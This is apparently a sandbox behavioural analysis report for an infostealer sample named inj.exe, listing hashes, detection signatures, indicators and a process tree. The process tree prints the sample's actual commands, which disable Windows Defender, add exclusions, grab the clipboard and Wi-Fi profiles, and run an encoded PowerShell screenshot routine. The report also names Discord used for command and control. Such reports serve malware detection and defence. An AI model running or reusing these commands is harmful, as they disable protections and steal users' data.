Analysis
-
max time kernel
264s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-11-2024 23:34
Behavioral task
behavioral1
Sample
inj.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
inj.exe
Resource
win10v2004-20241007-en
General
-
Target
inj.exe
-
Size
10.5MB
-
MD5
30c4645670d838c63585b676364dd8d6
-
SHA1
291b518f887081bea3ff7af7aba5e9874f626125
-
SHA256
2b0cb8c8c4e9a1eb5c2c139737d7c0a391699c1891e4d46b1dbeda30368e023b
-
SHA512
ff3adc9164022980894e077e22f561e156d1ca104d103da44551d83d3bb3e232bff01368a36213015c7cb280eb755e265e10a818723e57dd392fc88a355c5f6a
-
SSDEEP
196608:P7QskjSBQiRMIQiV9ym+0SzXbT/9bvLz3S1bA3zIn9VDz:FPQiOI59yX0SrbTlj3S1bOzI/X
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bound.exe -
pid Process 1224 powershell.exe 2688 powershell.exe 3528 powershell.exe 2608 powershell.exe 2916 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ElsYOwFfczQVQGE\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ElsYOwFfczQVQGE" 1FNhx.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bound.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bound.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation bound.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 400 powershell.exe 668 cmd.exe -
Executes dropped EXE 3 IoCs
pid Process 3040 bound.exe 4804 1FNhx.exe 4336 rar.exe -
Loads dropped DLL 18 IoCs
pid Process 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4448 inj.exe 4804 1FNhx.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000a000000023b9e-107.dat themida behavioral2/memory/3040-122-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-161-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-162-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-164-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-165-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-163-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-317-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-318-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-339-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-340-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida behavioral2/memory/3040-344-0x00007FF71D250000-0x00007FF71DBD7000-memory.dmp themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bound.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 discord.com 21 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1008 tasklist.exe 1068 tasklist.exe 4112 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3040 bound.exe -
resource yara_rule behavioral2/files/0x000a000000023b97-22.dat upx behavioral2/memory/4448-26-0x00007FFE10E10000-0x00007FFE113F9000-memory.dmp upx behavioral2/files/0x000a000000023b89-28.dat upx behavioral2/files/0x000a000000023b95-30.dat upx behavioral2/files/0x000a000000023b90-48.dat upx behavioral2/files/0x000a000000023b8f-47.dat upx behavioral2/files/0x000a000000023b8e-46.dat upx behavioral2/files/0x000a000000023b8d-45.dat upx behavioral2/files/0x000a000000023b8c-44.dat upx behavioral2/files/0x000a000000023b8b-43.dat upx behavioral2/files/0x000a000000023b8a-42.dat upx behavioral2/files/0x000a000000023b88-41.dat upx behavioral2/files/0x000a000000023b9c-40.dat upx behavioral2/files/0x000a000000023b9b-39.dat upx behavioral2/files/0x000a000000023b9a-38.dat upx behavioral2/files/0x000a000000023b96-35.dat upx behavioral2/files/0x000a000000023b94-34.dat upx behavioral2/memory/4448-50-0x00007FFE28FE0000-0x00007FFE28FEF000-memory.dmp upx behavioral2/memory/4448-49-0x00007FFE24010000-0x00007FFE24033000-memory.dmp upx behavioral2/memory/4448-56-0x00007FFE204B0000-0x00007FFE204DD000-memory.dmp upx behavioral2/memory/4448-61-0x00007FFE203D0000-0x00007FFE203F3000-memory.dmp upx behavioral2/memory/4448-62-0x00007FFE10820000-0x00007FFE10997000-memory.dmp upx behavioral2/memory/4448-60-0x00007FFE20490000-0x00007FFE204A9000-memory.dmp upx behavioral2/memory/4448-64-0x00007FFE1E140000-0x00007FFE1E159000-memory.dmp upx behavioral2/memory/4448-66-0x00007FFE20680000-0x00007FFE2068D000-memory.dmp upx behavioral2/memory/4448-68-0x00007FFE1B0C0000-0x00007FFE1B0EE000-memory.dmp upx behavioral2/memory/4448-70-0x00007FFE0FD80000-0x00007FFE0FE38000-memory.dmp upx behavioral2/memory/4448-73-0x00007FFE10E10000-0x00007FFE113F9000-memory.dmp upx behavioral2/memory/4448-74-0x00007FFE0FA00000-0x00007FFE0FD78000-memory.dmp upx behavioral2/memory/4448-76-0x00007FFE24010000-0x00007FFE24033000-memory.dmp upx behavioral2/memory/4448-80-0x00007FFE20520000-0x00007FFE2052D000-memory.dmp upx behavioral2/memory/4448-79-0x00007FFE27E10000-0x00007FFE27E24000-memory.dmp upx behavioral2/memory/4448-83-0x00007FFE203D0000-0x00007FFE203F3000-memory.dmp upx behavioral2/memory/4448-85-0x00007FFE10A70000-0x00007FFE10B8C000-memory.dmp upx behavioral2/memory/4448-84-0x00007FFE10820000-0x00007FFE10997000-memory.dmp upx behavioral2/memory/4448-166-0x00007FFE1E140000-0x00007FFE1E159000-memory.dmp upx behavioral2/memory/4448-215-0x00007FFE1B0C0000-0x00007FFE1B0EE000-memory.dmp upx behavioral2/memory/4448-239-0x00007FFE0FA00000-0x00007FFE0FD78000-memory.dmp upx behavioral2/memory/4448-238-0x00007FFE0FD80000-0x00007FFE0FE38000-memory.dmp upx behavioral2/memory/4448-288-0x00007FFE10820000-0x00007FFE10997000-memory.dmp upx behavioral2/memory/4448-282-0x00007FFE10E10000-0x00007FFE113F9000-memory.dmp upx behavioral2/memory/4448-283-0x00007FFE24010000-0x00007FFE24033000-memory.dmp upx behavioral2/memory/4448-324-0x00007FFE203D0000-0x00007FFE203F3000-memory.dmp upx behavioral2/memory/4448-330-0x00007FFE0FA00000-0x00007FFE0FD78000-memory.dmp upx behavioral2/memory/4448-337-0x00007FFE1B0C0000-0x00007FFE1B0EE000-memory.dmp upx behavioral2/memory/4448-336-0x00007FFE20680000-0x00007FFE2068D000-memory.dmp upx behavioral2/memory/4448-335-0x00007FFE1E140000-0x00007FFE1E159000-memory.dmp upx behavioral2/memory/4448-334-0x00007FFE10820000-0x00007FFE10997000-memory.dmp upx behavioral2/memory/4448-333-0x00007FFE10A70000-0x00007FFE10B8C000-memory.dmp upx behavioral2/memory/4448-332-0x00007FFE20520000-0x00007FFE2052D000-memory.dmp upx behavioral2/memory/4448-331-0x00007FFE27E10000-0x00007FFE27E24000-memory.dmp upx behavioral2/memory/4448-329-0x00007FFE0FD80000-0x00007FFE0FE38000-memory.dmp upx behavioral2/memory/4448-323-0x00007FFE20490000-0x00007FFE204A9000-memory.dmp upx behavioral2/memory/4448-322-0x00007FFE204B0000-0x00007FFE204DD000-memory.dmp upx behavioral2/memory/4448-321-0x00007FFE28FE0000-0x00007FFE28FEF000-memory.dmp upx behavioral2/memory/4448-320-0x00007FFE24010000-0x00007FFE24033000-memory.dmp upx behavioral2/memory/4448-319-0x00007FFE10E10000-0x00007FFE113F9000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\SoftwareDistribution\Download\1FNhx.exe bound.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1548 netsh.exe 404 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1224 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2872 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2608 powershell.exe 2608 powershell.exe 2916 powershell.exe 2916 powershell.exe 400 powershell.exe 400 powershell.exe 1224 powershell.exe 1224 powershell.exe 4628 powershell.exe 4628 powershell.exe 400 powershell.exe 2916 powershell.exe 2608 powershell.exe 4628 powershell.exe 1224 powershell.exe 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 3528 powershell.exe 3528 powershell.exe 3528 powershell.exe 2872 powershell.exe 2872 powershell.exe 2872 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4804 1FNhx.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1068 tasklist.exe Token: SeDebugPrivilege 4112 tasklist.exe Token: SeIncreaseQuotaPrivilege 2496 WMIC.exe Token: SeSecurityPrivilege 2496 WMIC.exe Token: SeTakeOwnershipPrivilege 2496 WMIC.exe Token: SeLoadDriverPrivilege 2496 WMIC.exe Token: SeSystemProfilePrivilege 2496 WMIC.exe Token: SeSystemtimePrivilege 2496 WMIC.exe Token: SeProfSingleProcessPrivilege 2496 WMIC.exe Token: SeIncBasePriorityPrivilege 2496 WMIC.exe Token: SeCreatePagefilePrivilege 2496 WMIC.exe Token: SeBackupPrivilege 2496 WMIC.exe Token: SeRestorePrivilege 2496 WMIC.exe Token: SeShutdownPrivilege 2496 WMIC.exe Token: SeDebugPrivilege 2496 WMIC.exe Token: SeSystemEnvironmentPrivilege 2496 WMIC.exe Token: SeRemoteShutdownPrivilege 2496 WMIC.exe Token: SeUndockPrivilege 2496 WMIC.exe Token: SeManageVolumePrivilege 2496 WMIC.exe Token: 33 2496 WMIC.exe Token: 34 2496 WMIC.exe Token: 35 2496 WMIC.exe Token: 36 2496 WMIC.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 1008 tasklist.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 1224 powershell.exe Token: SeIncreaseQuotaPrivilege 2496 WMIC.exe Token: SeSecurityPrivilege 2496 WMIC.exe Token: SeTakeOwnershipPrivilege 2496 WMIC.exe Token: SeLoadDriverPrivilege 2496 WMIC.exe Token: SeSystemProfilePrivilege 2496 WMIC.exe Token: SeSystemtimePrivilege 2496 WMIC.exe Token: SeProfSingleProcessPrivilege 2496 WMIC.exe Token: SeIncBasePriorityPrivilege 2496 WMIC.exe Token: SeCreatePagefilePrivilege 2496 WMIC.exe Token: SeBackupPrivilege 2496 WMIC.exe Token: SeRestorePrivilege 2496 WMIC.exe Token: SeShutdownPrivilege 2496 WMIC.exe Token: SeDebugPrivilege 2496 WMIC.exe Token: SeSystemEnvironmentPrivilege 2496 WMIC.exe Token: SeRemoteShutdownPrivilege 2496 WMIC.exe Token: SeUndockPrivilege 2496 WMIC.exe Token: SeManageVolumePrivilege 2496 WMIC.exe Token: 33 2496 WMIC.exe Token: 34 2496 WMIC.exe Token: 35 2496 WMIC.exe Token: 36 2496 WMIC.exe Token: SeDebugPrivilege 4628 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeLoadDriverPrivilege 4804 1FNhx.exe Token: SeIncreaseQuotaPrivilege 5080 WMIC.exe Token: SeSecurityPrivilege 5080 WMIC.exe Token: SeTakeOwnershipPrivilege 5080 WMIC.exe Token: SeLoadDriverPrivilege 5080 WMIC.exe Token: SeSystemProfilePrivilege 5080 WMIC.exe Token: SeSystemtimePrivilege 5080 WMIC.exe Token: SeProfSingleProcessPrivilege 5080 WMIC.exe Token: SeIncBasePriorityPrivilege 5080 WMIC.exe Token: SeCreatePagefilePrivilege 5080 WMIC.exe Token: SeBackupPrivilege 5080 WMIC.exe Token: SeRestorePrivilege 5080 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3904 wrote to memory of 4448 3904 inj.exe 84 PID 3904 wrote to memory of 4448 3904 inj.exe 84 PID 4448 wrote to memory of 4052 4448 inj.exe 87 PID 4448 wrote to memory of 4052 4448 inj.exe 87 PID 4448 wrote to memory of 2752 4448 inj.exe 89 PID 4448 wrote to memory of 2752 4448 inj.exe 89 PID 4448 wrote to memory of 68 4448 inj.exe 90 PID 4448 wrote to memory of 68 4448 inj.exe 90 PID 4448 wrote to memory of 2092 4448 inj.exe 91 PID 4448 wrote to memory of 2092 4448 inj.exe 91 PID 4448 wrote to memory of 3220 4448 inj.exe 95 PID 4448 wrote to memory of 3220 4448 inj.exe 95 PID 4448 wrote to memory of 4708 4448 inj.exe 96 PID 4448 wrote to memory of 4708 4448 inj.exe 96 PID 4448 wrote to memory of 3960 4448 inj.exe 99 PID 4448 wrote to memory of 3960 4448 inj.exe 99 PID 4448 wrote to memory of 668 4448 inj.exe 101 PID 4448 wrote to memory of 668 4448 inj.exe 101 PID 4448 wrote to memory of 936 4448 inj.exe 102 PID 4448 wrote to memory of 936 4448 inj.exe 102 PID 4448 wrote to memory of 2736 4448 inj.exe 103 PID 4448 wrote to memory of 2736 4448 inj.exe 103 PID 3220 wrote to memory of 1068 3220 cmd.exe 106 PID 3220 wrote to memory of 1068 3220 cmd.exe 106 PID 4448 wrote to memory of 404 4448 inj.exe 108 PID 4448 wrote to memory of 404 4448 inj.exe 108 PID 4708 wrote to memory of 4112 4708 cmd.exe 109 PID 4708 wrote to memory of 4112 4708 cmd.exe 109 PID 2752 wrote to memory of 1224 2752 cmd.exe 111 PID 2752 wrote to memory of 1224 2752 cmd.exe 111 PID 4448 wrote to memory of 2900 4448 inj.exe 112 PID 4448 wrote to memory of 2900 4448 inj.exe 112 PID 4448 wrote to memory of 2760 4448 inj.exe 114 PID 4448 wrote to memory of 2760 4448 inj.exe 114 PID 3960 wrote to memory of 2496 3960 cmd.exe 115 PID 3960 wrote to memory of 2496 3960 cmd.exe 115 PID 2092 wrote to memory of 3040 2092 cmd.exe 116 PID 2092 wrote to memory of 3040 2092 cmd.exe 116 PID 4052 wrote to memory of 2608 4052 cmd.exe 117 PID 4052 wrote to memory of 2608 4052 cmd.exe 117 PID 668 wrote to memory of 400 668 cmd.exe 120 PID 668 wrote to memory of 400 668 cmd.exe 120 PID 68 wrote to memory of 2916 68 cmd.exe 121 PID 68 wrote to memory of 2916 68 cmd.exe 121 PID 936 wrote to memory of 1008 936 cmd.exe 122 PID 936 wrote to memory of 1008 936 cmd.exe 122 PID 404 wrote to memory of 1548 404 cmd.exe 124 PID 404 wrote to memory of 1548 404 cmd.exe 124 PID 2736 wrote to memory of 1728 2736 cmd.exe 130 PID 2736 wrote to memory of 1728 2736 cmd.exe 130 PID 2900 wrote to memory of 2872 2900 cmd.exe 126 PID 2900 wrote to memory of 2872 2900 cmd.exe 126 PID 2760 wrote to memory of 4628 2760 cmd.exe 127 PID 2760 wrote to memory of 4628 2760 cmd.exe 127 PID 4448 wrote to memory of 1440 4448 inj.exe 153 PID 4448 wrote to memory of 1440 4448 inj.exe 153 PID 4448 wrote to memory of 1728 4448 inj.exe 130 PID 4448 wrote to memory of 1728 4448 inj.exe 130 PID 1440 wrote to memory of 3720 1440 cmd.exe 132 PID 1440 wrote to memory of 3720 1440 cmd.exe 132 PID 1728 wrote to memory of 2688 1728 cmd.exe 133 PID 1728 wrote to memory of 2688 1728 cmd.exe 133 PID 4628 wrote to memory of 4680 4628 powershell.exe 134 PID 4628 wrote to memory of 4680 4628 powershell.exe 134
Processes
-
C:\Users\Admin\AppData\Local\Temp\inj.exe"C:\Users\Admin\AppData\Local\Temp\inj.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\inj.exe"C:\Users\Admin\AppData\Local\Temp\inj.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\inj.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\inj.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:68 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:3040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:2832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 95⤵PID:3880
-
-
C:\Windows\SoftwareDistribution\Download\1FNhx.exe"C:\Windows\SoftwareDistribution\Download\1FNhx.exe"5⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAG